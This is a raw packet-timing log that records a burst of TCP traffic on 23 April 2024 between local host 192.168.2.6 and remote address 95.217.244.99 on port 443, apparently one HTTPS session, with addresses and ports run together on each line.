                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.164860010 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.164870024 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.164921999 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.170633078 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.170649052 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.170738935 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.170759916 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.170800924 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.176493883 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.176512003 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.176579952 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.176589966 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.176623106 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.183501959 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.183516979 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.183594942 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.183617115 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.183657885 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.189958096 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.189974070 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.190052032 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.190067053 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.190105915 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.195529938 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.195547104 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.195621014 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.195627928 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.195664883 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.202104092 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.202121019 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.202208996 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.202214956 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.202255964 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.209055901 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.209072113 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.209153891 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.209161997 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.209202051 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.214313984 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.214329958 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.214417934 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.214430094 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.214471102 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.219496965 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.219512939 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.219593048 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.219602108 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.219640017 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.225770950 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.225790977 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.225874901 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.225882053 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.225919962 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.230854034 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.230875015 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.230952978 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.230966091 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.231005907 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.235754013 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.235773087 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.235857964 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.235872984 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.235909939 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.241509914 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.241529942 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.241605043 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.241611958 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.241650105 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.246380091 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.246402979 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.246460915 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.246465921 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.246500969 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.251321077 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.251339912 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.251398087 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.251403093 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.251446009 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.255935907 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.255958080 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.256017923 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.256022930 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.256059885 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.261250973 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.261270046 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.261338949 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.261343956 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.261384964 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.265820980 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.265836954 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.265921116 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.265925884 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.265965939 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.270628929 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.270643950 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.270715952 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.270720005 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.270759106 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.276206017 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.276221037 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.276294947 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.276299953 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.276339054 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.280023098 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.280035973 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.280107975 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.280112028 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.280147076 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.284586906 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.284600019 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.284686089 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.284712076 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.284751892 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.289020061 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.289033890 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.289113045 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.289119959 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.289160967 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.293874025 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.293888092 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.293961048 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.293966055 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.294013023 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.298100948 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.298141956 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.298181057 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.298186064 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.298228979 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.302783966 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.302826881 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.302876949 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.302882910 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.302907944 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.302933931 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.307095051 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.307135105 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.307178020 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.307185888 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.307218075 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.307248116 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.310671091 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.310717106 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.310760975 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.310766935 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.310800076 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.310825109 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.314531088 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.314574957 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.314620972 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.314625978 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.314675093 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.319314003 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.319354057 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.319400072 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.319412947 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.319430113 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.319459915 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.322695017 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.322736025 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.322779894 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.322784901 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.322820902 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.322845936 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.327301025 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.327341080 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.327378988 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.327383041 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.327429056 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.331396103 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.331438065 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.331475019 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.331480026 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.331506014 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.331532955 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.334609985 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.334656000 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.334687948 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.334692001 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.334733963 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.338130951 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.338171959 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.338206053 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.338211060 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.338243008 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.338262081 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.342433929 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.342513084 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.342550039 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.342555046 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.342595100 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.345896006 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.345936060 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.345972061 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.345976114 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.345999956 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.346025944 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.349263906 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.349307060 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.349339962 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.349344015 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.349387884 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.353529930 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.353573084 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.353617907 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.353630066 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.353647947 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.353677034 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.356726885 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.356743097 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.356817961 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.356832981 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.356872082 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.359970093 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.359987020 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.360050917 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.360061884 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.360105991 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.363214016 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.363240004 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.363312960 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.363322973 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.363360882 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.367111921 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.367134094 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.367227077 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.367235899 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.367276907 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.370290041 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.370309114 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.370390892 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.370399952 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.370436907 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.373421907 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.373439074 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.373524904 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.373538017 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.373577118 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.377213001 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.377232075 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.377350092 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.377357960 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.377403021 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.380285978 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.380306005 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.380393982 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.380400896 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.380444050 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.383269072 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.383287907 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.383354902 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.383368969 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.383397102 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.383421898 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.386221886 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.386235952 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.386298895 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.386313915 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.386352062 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.389230967 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.389245987 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.389303923 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.389307976 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.389347076 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.392656088 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.392671108 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.392745972 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.392750025 CEST4434972395.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.392787933 CEST49723443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:18.395539045 CEST4434972395.217.244.99192.168.2.6
